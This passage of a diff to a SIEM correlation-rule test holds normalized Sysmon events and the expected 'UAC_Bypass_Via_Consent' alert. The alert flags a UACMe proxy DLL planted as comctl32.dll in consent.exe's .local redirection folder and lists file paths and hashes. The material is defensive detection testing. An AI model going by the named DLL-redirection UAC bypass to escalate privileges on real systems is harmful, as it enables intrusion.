"999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "start", "alert.key": "consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "subject.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "subject.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.id": "2328", "subject.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "subject.process.name": "consent.exe", "subject.process.original_name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "subject.process.parent.id": "368", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.3232 (WinBuild.160101.0800)"} - +expect 1 {"action":"start","alert.key":"consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","asset_ids":null,"category.generic":"Attack","category.high":"Privilege Escalation","category.low":"Bypass User Account Control","correlation_name":"UAC_Bypass_Via_Consent","correlation_type":"event","datafield6":"20fff121-f3f7-647d-e703-000000000000","event_src.asset":"1864e292-4880-0001-0000-000000000007","event_src.category":"Other","event_src.fqdn":"wks05.example.com","event_src.host":"wks05.example.com","event_src.hostname":"wks05","event_src.rule":"-","event_src.subsys":"Microsoft-Windows-Sysmon/Operational","event_src.title":"sysmon","event_src.vendor":"microsoft","importance":"medium","incident.aggregation.key":"UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","incident.aggregation.timeout":7200,"incident.category":"Undefined","incident.severity":"medium","object":"module","object.process.fullpath":"c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","object.process.hash":"IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80","object.process.hash.md5":"9E5AED3F57CEBC5154F9373B2BB9BA05","object.process.hash.sha256":"FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80","object.process.meta":"Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments","object.process.name":"comctl32.dll","object.process.original_name":"Ikazuchi.dll","object.process.path":"c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\","object.property":"signature status","object.value":"not signed","status":"success","subject":"process","subject.account.domain":"nt authority","subject.account.id":"synthetic:system@nt authority","subject.account.name":"system","subject.account.session_id":"999","subject.process.chain":"consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe","subject.process.cmdline":"consent.exe 368 272 00000285D6BE22C0","subject.process.cwd":"C:\\Windows\\system32\\","subject.process.fullpath":"c:\\windows\\system32\\consent.exe","subject.process.guid":"20fff121-f8dd-647d-8401-000000003900","subject.process.hash":"IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C","subject.process.hash.md5":"C67713C28BB97E685FEB88FFAEB96788","subject.process.hash.sha256":"6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C","subject.process.id":"2328","subject.process.meta":"Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation","subject.process.name":"consent.exe","subject.process.original_name":"consent.exe","subject.process.parent.cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p","subject.process.parent.fullpath":"c:\\windows\\system32\\svchost.exe","subject.process.parent.guid":"20fff121-f3f8-647d-1300-000000003900","subject.process.parent.id":"368","subject.process.parent.name":"svchost.exe","subject.process.parent.path":"c:\\windows\\system32\\","subject.process.path":"c:\\windows\\system32\\","subject.process.version":"10.0.17763.3232 (WinBuild.160101.0800)"} \ No newline at end of file